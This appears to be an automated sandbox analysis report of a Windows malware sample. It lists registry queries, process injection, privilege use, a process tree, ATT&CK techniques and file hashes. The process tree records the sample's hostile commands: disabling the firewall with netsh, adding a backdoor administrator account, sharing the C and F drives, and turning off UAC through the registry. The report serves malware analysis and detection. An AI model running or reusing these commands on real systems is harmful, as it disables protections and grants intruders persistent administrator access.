description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cftmon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cftmon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 2840 svchost.com 4092 cftmon.exe 4092 cftmon.exe 4332 svchost.com 4332 svchost.com 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe 3448 cftmon.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Token: SeDebugPrivilege 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3164 wrote to memory of 4452 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 84 PID 3164 wrote to memory of 4452 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 84 PID 3164 wrote to memory of 4452 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 84 PID 3164 wrote to memory of 780 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 9 PID 3164 wrote to memory of 784 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 10 PID 3164 wrote to memory of 1020 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 13 PID 3164 wrote to memory of 2644 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 44 PID 3164 wrote to memory of 2672 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 45 PID 3164 wrote to memory of 2756 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 47 PID 3164 wrote to memory of 3464 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 56 PID 3164 wrote to memory of 3652 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 57 PID 3164 wrote to memory of 3832 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 58 PID 3164 wrote to memory of 3928 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 59 PID 3164 wrote to memory of 3992 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 60 PID 3164 wrote to memory of 4080 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 61 PID 3164 wrote to memory of 3748 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 62 PID 3164 wrote to memory of 1796 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 74 PID 3164 wrote to memory of 3988 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 76 PID 3164 wrote to memory of 4452 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 84 PID 3164 wrote to memory of 4452 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 84 PID 3164 wrote to memory of 4252 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 85 PID 3164 wrote to memory of 2840 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 86 PID 3164 wrote to memory of 2840 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 86 PID 3164 wrote to memory of 2840 3164 f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe 86 PID 2840 wrote to memory of 4092 2840 svchost.com 88 PID 2840 wrote to memory of 4092 2840 svchost.com 88 PID 2840 wrote to memory of 4092 2840 svchost.com 88 PID 4092 wrote to memory of 1160 4092 cftmon.exe 89 PID 4092 wrote to memory of 1160 4092 cftmon.exe 89 PID 4092 wrote to memory of 1160 4092 cftmon.exe 89 PID 2840 wrote to memory of 4332 2840 svchost.com 90 PID 2840 wrote to memory of 4332 2840 svchost.com 90 PID 2840 wrote to memory of 4332 2840 svchost.com 90 PID 4092 wrote to memory of 780 4092 cftmon.exe 9 PID 4092 wrote to memory of 784 4092 cftmon.exe 10 PID 4092 wrote to memory of 1020 4092 cftmon.exe 13 PID 4092 wrote to memory of 2644 4092 cftmon.exe 44 PID 4092 wrote to memory of 2672 4092 cftmon.exe 45 PID 4092 wrote to memory of 2756 4092 cftmon.exe 47 PID 4092 wrote to memory of 3464 4092 cftmon.exe 56 PID 4092 wrote to memory of 3652 4092 cftmon.exe 57 PID 4092 wrote to memory of 3832 4092 cftmon.exe 58 PID 4092 wrote to memory of 3928 4092 cftmon.exe 59 PID 4092 wrote to memory of 3992 4092 cftmon.exe 60 PID 4092 wrote to memory of 4080 4092 cftmon.exe 61 PID 4092 wrote to memory of 3748 4092 cftmon.exe 62 PID 4092 wrote to memory of 1796 4092 cftmon.exe 74 PID 4092 wrote to memory of 3988 4092 cftmon.exe 76 PID 4092 wrote to memory of 4252 4092 cftmon.exe 85 PID 4092 wrote to memory of 2840 4092 cftmon.exe 86 PID 4092 wrote to memory of 2840 4092 cftmon.exe 86 PID 4092 wrote to memory of 1160 4092 cftmon.exe 89 PID 4092 wrote to memory of 1160 4092 cftmon.exe 89 PID 4092 wrote to memory of 4332 4092 cftmon.exe 90 PID 4092 wrote to memory of 4332 4092 cftmon.exe 90 PID 4092 wrote to memory of 3448 4092 cftmon.exe 92 PID 4092 wrote to memory of 3448 4092 cftmon.exe 92 PID 4092 wrote to memory of 3448 4092 cftmon.exe 92 PID 3448 wrote to memory of 1508 3448 cftmon.exe 93 PID 3448 wrote to memory of 1508 3448 cftmon.exe 93 PID 3448 wrote to memory of 1508 3448 cftmon.exe 93 PID 3448 wrote to memory of 780 3448 cftmon.exe 9 PID 3448 wrote to memory of 784 3448 cftmon.exe 10 PID 3448 wrote to memory of 1020 3448 cftmon.exe 13 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cftmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cftmon.exe
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:780
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:784
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:1020
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2672
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2756
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3464
-
C:\Users\Admin\AppData\Local\Temp\f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f04861809694b1c8661a3adbfd11045d_JaffaCakes118.exe"2⤵
- UAC bypass
- Windows security bypass
- Disables RegEdit via registry modification
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3164 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.com"C:\Users\Admin\AppData\Local\Temp\svchost.com"3⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Program Files (x86)\Common Files\System\cftmon.exe"C:\Program Files (x86)\Common Files\System\cftmon.exe" stay_alive -in4⤵
- UAC bypass
- Windows security bypass
- Disables RegEdit via registry modification
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4092 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1160 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4976
-
-
-
C:\Program Files (x86)\Common Files\System\cftmon.exe"C:\Program Files (x86)\Common Files\System\cftmon.exe" stay_alive -r5⤵
- UAC bypass
- Windows security bypass
- Disables RegEdit via registry modification
- Deletes itself
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3448 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1508
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE"6⤵PID:4472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.comC:\Users\Admin\AppData\Local\Temp\svchost.com keep_fucking4⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4332
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" share SYS_c=c:\4⤵PID:4092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share SYS_c=c:\5⤵PID:452
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" share SYS_f=f:\4⤵PID:1964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share SYS_f=f:\5⤵PID:3452
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" user guest guest4⤵PID:1500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user guest guest5⤵PID:1628
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" user /add Network_Service4⤵PID:3480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user /add Network_Service5⤵PID:2376
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" user Network_Service 10167604⤵PID:4828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Network_Service 10167605⤵PID:3720
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" localgroup administrators Network_Service /add4⤵PID:1196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators Network_Service /add5⤵PID:4480
-
-
-
C:\Program Files (x86)\Common Files\System\cftmon.exe"C:\Program Files (x86)\Common Files\System\cftmon.exe" stay_alive -in4⤵PID:3232
-
C:\Program Files (x86)\Common Files\System\cftmon.exe"C:\Program Files (x86)\Common Files\System\cftmon.exe" stay_alive -r5⤵PID:4728
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3652
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3832
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3928
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3992
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4080
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3748
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:1796
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3988
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
8Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
368KB
MD5f04861809694b1c8661a3adbfd11045d
SHA101dc81993524aded936f960a7ea60f152abd80c5
SHA256da56ff6445214f6a37147898a55b6b3b2d4a83fa515ff213d45d550124f11c5e
SHA512f5e6ae66743f6dd95afaf560cb7ed8a5896733ac37379cf59d9f5c118b0df8852cb9569735c209e65ff294769697a786542d8238bcf6ef3d42713ede8538d079
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
257B
MD5e3bc7fef3591487f663e640778d8f414
SHA1f32da9c7722d22b0bc6ee9dd740e2f2331621541
SHA256558cc848fc8aaa292115648f75cb2afd49f173ae376faaa9633a556d75adb3e5
SHA5121f7cdf3652454504e42cb53c113cd2c3eb07731970e4c97349584167aec939e53a920f2df031e165ad9e2005b903123c07d5b53bfab693dcfc0822eebd7b3192